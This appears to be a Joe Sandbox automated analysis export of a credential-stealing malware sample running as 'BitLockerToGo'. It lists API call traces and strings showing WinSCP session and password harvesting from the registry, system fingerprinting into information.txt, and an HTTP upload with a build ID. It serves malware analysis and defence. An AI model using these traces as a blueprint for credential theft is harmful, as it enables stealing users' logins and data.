• RegOpenKeyExA.KERNEL32(80000001,Software\Martin Prikryl\WinSCP 2\Configuration,00000000,00000001,?,?,?,?,?,?,?,?,?,?,?,?), ref: 02A0F229
• RegGetValueA.ADVAPI32(?,Security,UseMasterPassword,00000010,00000000,?,?), ref: 02A0F25A
• RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 02A0F272
• RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 02A0F299
• RegOpenKeyExA.ADVAPI32(80000001,Software\Martin Prikryl\WinSCP 2\Sessions,00000000,00000009,?,?,?,?,?,?,?,?,?,?,?,?), ref: 02A0F2B9
• RegEnumKeyExA.ADVAPI32(?,00000000,?,00000104,00000000,00000000,00000000,00000000), ref: 02A0F2DC
• RegGetValueA.ADVAPI32(?,?,HostName,00000002,00000000,?,?,Host: ,Soft: WinSCP,02A379CA), ref: 02A0F375
• RegGetValueA.ADVAPI32(?,?,PortNumber,0000FFFF,00000000,?,?,?), ref: 02A0F3D5
Strings
Memory Dump Source
• Source File: 00000003.00000002.3357688139.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2a00000_BitLockerToGo.jbxd
Yara matches
Similarity
• API ID: _memset$Value$CloseOpen$Enum
• String ID: Login: $:22$Host: $HostName$Password$Password: $PortNumber$Security$Soft: WinSCP$Software\Martin Prikryl\WinSCP 2\Configuration$Software\Martin Prikryl\WinSCP 2\Sessions$UseMasterPassword$UserName$passwords.txt

Control-flow Graph

• Executed
• Not Executed
APIs
  • Part of subcall function 02A12175: lstrcpy.KERNEL32(00000000,?), ref: 02A12194
  • Part of subcall function 02A049DE: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 02A04A10
  • Part of subcall function 02A049DE: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 02A04A16
  • Part of subcall function 02A049DE: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 02A04A1C
  • Part of subcall function 02A049DE: lstrlen.KERNEL32(000000FF,00000000,?), ref: 02A04A2E
  • Part of subcall function 02A049DE: InternetCrackUrlA.WININET(000000FF,00000000), ref: 02A04A36
  • Part of subcall function 02A12143: lstrcpy.KERNEL32(00000000,00000000), ref: 02A12169
• InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 02A05F00
• StrCmpCA.SHLWAPI(?), ref: 02A05F1E
• InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 02A060B6
• HttpOpenRequestA.WININET(?,?,00000000,00000000,?,00000000), ref: 02A060FA
• lstrlen.KERNEL32(?,",mode,02A38AA0,------,02A38A94,27536a38d3707b6600f28b9d7177a12c,",build_id,02A38A7C,------,02A38A70,",02A38A64,------), ref: 02A06529
• lstrlen.KERNEL32(?), ref: 02A06538
• GetProcessHeap.KERNEL32(00000000,00000000), ref: 02A06542
• RtlAllocateHeap.NTDLL(00000000), ref: 02A06549
• lstrlen.KERNEL32(?), ref: 02A06556
• _memmove.LIBCMT ref: 02A06564
• lstrlen.KERNEL32(?), ref: 02A06572
• lstrlen.KERNEL32(?,?,00000000), ref: 02A06580
• _memmove.LIBCMT ref: 02A0658D
• lstrlen.KERNEL32(?,?,00000000), ref: 02A065A2
• HttpSendRequestA.WININET(?,?,00000000), ref: 02A065B5
• InternetReadFile.WININET(?,?,000000C7,?), ref: 02A06616
• InternetCloseHandle.WININET(?), ref: 02A06626
• InternetCloseHandle.WININET(?), ref: 02A06632
• InternetCloseHandle.WININET(?), ref: 02A06644
• InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 02A0612C
  • Part of subcall function 02A12265: lstrlen.KERNEL32(?,?,?,02A18FD9,abc_,00000000,02A37786,?,?,?,?,02A19D6E), ref: 02A12279
  • Part of subcall function 02A12265: lstrcpy.KERNEL32(00000000,?), ref: 02A122A1
  • Part of subcall function 02A12265: lstrcat.KERNEL32(?,00000000), ref: 02A122AC
  • Part of subcall function 02A121E9: lstrcpy.KERNEL32(00000000,?), ref: 02A12219
  • Part of subcall function 02A12223: lstrcpy.KERNEL32(00000000,?), ref: 02A12251
  • Part of subcall function 02A12223: lstrcat.KERNEL32(?,?), ref: 02A1225B
Strings
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3357688139.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a00000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: Internetlstrlen$lstrcpy$CloseHandle$HeapHttpOpenRequest_memmovelstrcat$AllocateConnectCrackFileOptionProcessReadSend
                                                                                                                                                                                                                                                                                                                                                          • String ID: "$"$"$------$------$------$------$27536a38d3707b6600f28b9d7177a12c$build_id$mode
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3306106941-2461365301
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: baeae788159faf54cdd2fa942c73b25e1423938ccbdb702b1bbeb0ccf616104e
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 3611a04b5e2b7a9292b754326624c8ee6b679642c673d10d153219815b14c6d2
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: baeae788159faf54cdd2fa942c73b25e1423938ccbdb702b1bbeb0ccf616104e
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F5229231D8017D9ADF61EB61EE85BCDB776AF04310F0185E2AA0973160DE71AF9A8F50

Control-flow Graph

[Graph image not preserved: control_flow_graph 1833 2a158c3-2a162e2; legend: Executed / Not Executed]
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12143: lstrcpy.KERNEL32(00000000,00000000), ref: 02A12169
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12265: lstrlen.KERNEL32(?,?,?,02A18FD9,abc_,00000000,02A37786,?,?,?,?,02A19D6E), ref: 02A12279
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12265: lstrcpy.KERNEL32(00000000,?), ref: 02A122A1
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12265: lstrcat.KERNEL32(?,00000000), ref: 02A122AC
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A121E9: lstrcpy.KERNEL32(00000000,?), ref: 02A12219
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A1291C: GetProcessHeap.KERNEL32(00000000,00000104,?,Version: ,02A3761F,?,?,?), ref: 02A12934
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A1291C: RtlAllocateHeap.NTDLL(00000000), ref: 02A1293B
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A1291C: GetLocalTime.KERNEL32(?), ref: 02A12947
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A1291C: wsprintfA.USER32 ref: 02A12972
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A13230: _memset.LIBCMT ref: 02A13263
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A13230: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00020119,?,?,?,?), ref: 02A13282
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A13230: RegQueryValueExA.KERNEL32(?,MachineGuid,00000000,00000000,?,000000FF,?,?,?), ref: 02A132A7
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A13230: RegCloseKey.ADVAPI32(?,?,?,?), ref: 02A132B3
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A13230: CharToOemA.USER32(?,?), ref: 02A132C7
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A132E0: GetCurrentHwProfileA.ADVAPI32(?), ref: 02A132FB
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A132E0: _memset.LIBCMT ref: 02A1332A
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A132E0: lstrcat.KERNEL32(?,00000000), ref: 02A13352
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A132E0: lstrcat.KERNEL32(?,02A37E68), ref: 02A1336F
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12223: lstrcpy.KERNEL32(00000000,?), ref: 02A12251
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12223: lstrcat.KERNEL32(?,?), ref: 02A1225B
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A125FE: GetWindowsDirectoryA.KERNEL32(?,00000104,?,?,00000000), ref: 02A12631
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A125FE: GetVolumeInformationA.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00000000), ref: 02A12671
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A125FE: GetProcessHeap.KERNEL32(00000000,00000104,?,?,00000000), ref: 02A126C6
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A125FE: RtlAllocateHeap.NTDLL(00000000), ref: 02A126CD
                                                                                                                                                                                                                                                                                                                                                          • GetCurrentProcessId.KERNEL32(Path: ,02A378BC,HWID: ,02A378B0,GUID: ,02A378A4,00000000,MachineID: ,02A37894,00000000,Date: ,02A37888,02A37884,11.7,Version: ,02A3761F), ref: 02A15B18
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A13EE1: OpenProcess.KERNEL32(00000410,00000000,02A15B27,00000000,?), ref: 02A13F03
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A13EE1: K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 02A13F1E
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A13EE1: CloseHandle.KERNEL32(00000000), ref: 02A13F25
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A1278C: GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,02A15BD2,Windows: ,02A378E0), ref: 02A127A0
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A1278C: RtlAllocateHeap.NTDLL(00000000), ref: 02A127A7
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A13463: __EH_prolog3_catch_GS.LIBCMT ref: 02A1346A
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A13463: CoInitializeEx.COMBASE(00000000,00000000), ref: 02A1347B
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A13463: CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 02A1348C
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A13463: CoCreateInstance.COMBASE(02A33F70,00000000,00000001,02A33EA0,?), ref: 02A134A6
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A13463: CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 02A134DC
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A13463: VariantInit.OLEAUT32(?), ref: 02A13537
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A135F3: __EH_prolog3_catch.LIBCMT ref: 02A135FA
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A135F3: CoInitializeEx.COMBASE(00000000,00000000), ref: 02A13609
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A135F3: CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 02A1361A
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A135F3: CoCreateInstance.COMBASE(02A33F70,00000000,00000001,02A33EA0,?), ref: 02A13634
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A135F3: CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 02A1366A
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A135F3: VariantInit.OLEAUT32(?), ref: 02A136B9
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A128E1: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,02A01375), ref: 02A128ED
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A128E1: RtlAllocateHeap.NTDLL(00000000), ref: 02A128F4
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A128E1: GetComputerNameA.KERNEL32(00000000,02A01375), ref: 02A12908
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A128AF: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,02A013A9), ref: 02A128BB
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A128AF: RtlAllocateHeap.NTDLL(00000000), ref: 02A128C2
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A128AF: GetUserNameA.ADVAPI32(00000000,02A013A9), ref: 02A128D6
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A131BF: CreateDCA.GDI32(00000000,00000000,00000000,00000000), ref: 02A131D1
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A131BF: GetDeviceCaps.GDI32(00000000,00000008), ref: 02A131DC
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A131BF: GetDeviceCaps.GDI32(00000000,0000000A), ref: 02A131E7
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A131BF: ReleaseDC.USER32(00000000,00000000), ref: 02A131F2
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A131BF: GetProcessHeap.KERNEL32(00000000,00000104,?,?,02A15DD5,?,Display Resolution: ,02A37934,00000000,User Name: ,02A37924,00000000,Computer Name: ,02A37910,AV: ,02A37904), ref: 02A131FE
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A131BF: RtlAllocateHeap.NTDLL(00000000,?,?), ref: 02A13205
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A131BF: wsprintfA.USER32 ref: 02A13217
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12A37: GetKeyboardLayoutList.USER32(00000000,00000000,02A37812,?,?), ref: 02A12A68
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12A37: LocalAlloc.KERNEL32(00000040,00000000), ref: 02A12A76
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12A37: GetKeyboardLayoutList.USER32(00000000,00000000), ref: 02A12A84
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12A37: GetLocaleInfoA.KERNEL32(?,00000002,?,00000200,00000000), ref: 02A12AB3
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12A37: LocalFree.KERNEL32(00000000), ref: 02A12B5B
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A1298A: GetProcessHeap.KERNEL32(00000000,00000104,?), ref: 02A129A5
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A1298A: RtlAllocateHeap.NTDLL(00000000), ref: 02A129AC
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A1298A: GetTimeZoneInformation.KERNEL32(?), ref: 02A129BB
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A1298A: wsprintfA.USER32 ref: 02A129D9
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12BAD: GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,02A15F8F,Processor: ,[Hardware],02A37990,00000000,TimeZone: ,02A37980,00000000,Local Time: ,02A3796C), ref: 02A12BC1
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12BAD: RtlAllocateHeap.NTDLL(00000000), ref: 02A12BC8
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12BAD: RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,02A378C8,?,?,?,02A15F8F,Processor: ,[Hardware],02A37990,00000000,TimeZone: ,02A37980,00000000,Local Time: ), ref: 02A12BE6
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12BAD: RegQueryValueExA.KERNEL32(02A378C8,00000000,00000000,00000000,000000FF,?,?,?,02A15F8F,Processor: ,[Hardware],02A37990,00000000,TimeZone: ,02A37980,00000000), ref: 02A12C02
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12BAD: RegCloseKey.ADVAPI32(02A378C8,?,?,?,02A15F8F,Processor: ,[Hardware],02A37990,00000000,TimeZone: ,02A37980,00000000,Local Time: ,02A3796C,Keyboard Languages: ,02A37950), ref: 02A12C0B
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12C63: GetLogicalProcessorInformationEx.KERNELBASE(0000FFFF,00000000,?), ref: 02A12CD9
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12C63: wsprintfA.USER32 ref: 02A12D37
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12C16: GetSystemInfo.KERNEL32(?), ref: 02A12C30
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12C16: wsprintfA.USER32 ref: 02A12C48
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12D75: GetProcessHeap.KERNEL32(00000000,00000104,?,Keyboard Languages: ,02A37950,Display Resolution: ,02A37934,00000000,User Name: ,02A37924,00000000,Computer Name: ,02A37910,AV: ,02A37904,Install Date: ), ref: 02A12D8D
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12D75: RtlAllocateHeap.NTDLL(00000000), ref: 02A12D94
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12D75: GlobalMemoryStatusEx.KERNEL32(?,?,00000040), ref: 02A12DB0
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12D75: wsprintfA.USER32 ref: 02A12DD6
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12DEE: EnumDisplayDevicesA.USER32(00000000,00000000,?,00000001), ref: 02A12E45
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A13101: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,02A37817,?,?), ref: 02A13130
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A13101: Process32First.KERNEL32(00000000,00000128), ref: 02A13140
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A13101: Process32Next.KERNEL32(00000000,00000128), ref: 02A1319E
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A13101: CloseHandle.KERNEL32(00000000), ref: 02A131A9
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12E5F: RegOpenKeyExA.KERNEL32(?,00000000,00020019,?,02A37816,00000000,?,?), ref: 02A12ECF
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12E5F: RegEnumKeyExA.KERNEL32(?,?,?,?,00000000,00000000,00000000,00000000), ref: 02A12F0C
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12E5F: wsprintfA.USER32 ref: 02A12F39
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12E5F: RegOpenKeyExA.KERNEL32(?,?,00000000,00020019,?), ref: 02A12F58
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12E5F: RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?), ref: 02A12F8E
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12E5F: lstrlen.KERNEL32(?), ref: 02A12FA3
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12E5F: RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?,?,02A37E28), ref: 02A13038
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12E5F: RegCloseKey.ADVAPI32(?), ref: 02A130A2
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12E5F: RegCloseKey.ADVAPI32(?), ref: 02A130CE
                                                                                                                                                                                                                                                                                                                                                          • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,Keyboard Languages: ,02A37950,Display Resolution: ,02A37934,00000000,User Name: ,02A37924,00000000), ref: 02A162A0
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A18BE6: CreateThread.KERNEL32(00000000,00000000,02A18B15,?,00000000,00000000), ref: 02A18C85
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A18BE6: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 02A18C8D
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3357688139.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a00000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: Heap$Process$Allocate$wsprintf$Close$CreateOpen$InitializeQueryValuelstrcatlstrcpy$InformationLocalNamelstrlen$BlanketCapsCurrentDeviceEnumHandleInfoInitInstanceKeyboardLayoutListProcess32ProxySecurityTimeVariant_memset$AllocCharComputerDevicesDirectoryDisplayFileFirstFreeGlobalH_prolog3_catchH_prolog3_catch_LocaleLogicalMemoryModuleNextObjectProcessorProfileReleaseSingleSnapshotStatusSystemThreadToolhelp32UserVolumeWaitWindowsZone
                                                                                                                                                                                                                                                                                                                                                          • String ID: 11.7$AV: $Computer Name: $Cores: $Date: $Display Resolution: $GUID: $HWID: $Install Date: $Keyboard Languages: $Local Time: $MachineID: $Path: $Processor: $RAM: $Threads: $TimeZone: $User Name: $Version: $VideoCard: $Windows: $Work Dir: In memory$[Hardware]$[Processes]$[Software]$information.txt
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2795203874-2308926046
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: a992286b4004b1be4509ba78b5cdebdc47fb30b6c1b9f570d51946ed3e6cce2f
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 6d9fb904cca1ff651be6bc828ef5e0c71410c59b2a7eceb45286ce277ba297a1
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a992286b4004b1be4509ba78b5cdebdc47fb30b6c1b9f570d51946ed3e6cce2f
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 82526432D8012DAADF01FBA5EE82ADDB776AF04350B5145A1AE1077160DF31BF5A8F80

                                                                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                          control_flow_graph 2434 2a19e25-2a19e35 call 2a19d79 2437 2a1a026-2a1a083 LoadLibraryA * 5 2434->2437 2438 2a19e3b-2a1a021 call 2a07c77 GetProcAddress * 20 2434->2438 2439 2a1a085-2a1a092 GetProcAddress 2437->2439 2440 2a1a097-2a1a09e 2437->2440 2438->2437 2439->2440 2442 2a1a0a0-2a1a0c4 GetProcAddress * 2 2440->2442 2443 2a1a0c9-2a1a0d0 2440->2443 2442->2443 2445 2a1a0d2-2a1a0df GetProcAddress 2443->2445 2446 2a1a0e4-2a1a0eb 2443->2446 2445->2446 2448 2a1a0ed-2a1a0fa GetProcAddress 2446->2448 2449 2a1a0ff-2a1a106 2446->2449 2448->2449 2450 2a1a131 2449->2450 2451 2a1a108-2a1a12c GetProcAddress * 2 2449->2451 2451->2450
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32 ref: 02A19E66
                                                                                                                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32 ref: 02A19E7D
                                                                                                                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32 ref: 02A19E94
                                                                                                                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32 ref: 02A19EAB
                                                                                                                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32 ref: 02A19EC2
                                                                                                                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32 ref: 02A19ED9
                                                                                                                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32 ref: 02A19EF0
                                                                                                                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32 ref: 02A19F07
                                                                                                                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32 ref: 02A19F1E
                                                                                                                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32 ref: 02A19F35
                                                                                                                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32 ref: 02A19F4C
                                                                                                                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32 ref: 02A19F63
                                                                                                                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32 ref: 02A19F7A
                                                                                                                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32 ref: 02A19F91
                                                                                                                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32 ref: 02A19FA8
                                                                                                                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32 ref: 02A19FBF
                                                                                                                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32 ref: 02A19FD6
                                                                                                                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32 ref: 02A19FED
                                                                                                                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32 ref: 02A1A004
                                                                                                                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32 ref: 02A1A01B
                                                                                                                                                                                                                                                                                                                                                          • LoadLibraryA.KERNEL32(?,02A19CA1), ref: 02A1A02C
                                                                                                                                                                                                                                                                                                                                                          • LoadLibraryA.KERNEL32(?,02A19CA1), ref: 02A1A03D
                                                                                                                                                                                                                                                                                                                                                          • LoadLibraryA.KERNEL32(?,02A19CA1), ref: 02A1A04E
                                                                                                                                                                                                                                                                                                                                                          • LoadLibraryA.KERNEL32(?,02A19CA1), ref: 02A1A05F
                                                                                                                                                                                                                                                                                                                                                          • LoadLibraryA.KERNEL32(?,02A19CA1), ref: 02A1A070
                                                                                                                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(75070000,02A19CA1), ref: 02A1A08C
                                                                                                                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(75FD0000,02A19CA1), ref: 02A1A0A7
                                                                                                                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32 ref: 02A1A0BE
                                                                                                                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(75A50000,02A19CA1), ref: 02A1A0D9
                                                                                                                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(74E50000,02A19CA1), ref: 02A1A0F4
                                                                                                                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(76E80000,02A19CA1), ref: 02A1A10F
                                                                                                                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32 ref: 02A1A126
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3357688139.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a00000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: AddressProc$LibraryLoad
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2238633743-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 52f42005a8b4109379d3ef0d3ac58cc3a2c7707c05ee0f91008285642eb3e3f5
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 22fa00d9800ad61eed8ae9af60d3f87cd4ae320712a3691ef054c2df9bedf700
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 52f42005a8b4109379d3ef0d3ac58cc3a2c7707c05ee0f91008285642eb3e3f5
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8071E97DCC1201EFDB1A9F60EE4AB673AF2F7082153054B25FE9592224D77258B0EB52


                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12143: lstrcpy.KERNEL32(00000000,00000000), ref: 02A12169
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A138A6: GetSystemTime.KERNEL32(?,02A37807,?), ref: 02A138D5
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12265: lstrlen.KERNEL32(?,?,?,02A18FD9,abc_,00000000,02A37786,?,?,?,?,02A19D6E), ref: 02A12279
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12265: lstrcpy.KERNEL32(00000000,?), ref: 02A122A1
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12265: lstrcat.KERNEL32(?,00000000), ref: 02A122AC
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12223: lstrcpy.KERNEL32(00000000,?), ref: 02A12251
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12223: lstrcat.KERNEL32(?,?), ref: 02A1225B
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A121E9: lstrcpy.KERNEL32(00000000,?), ref: 02A12219
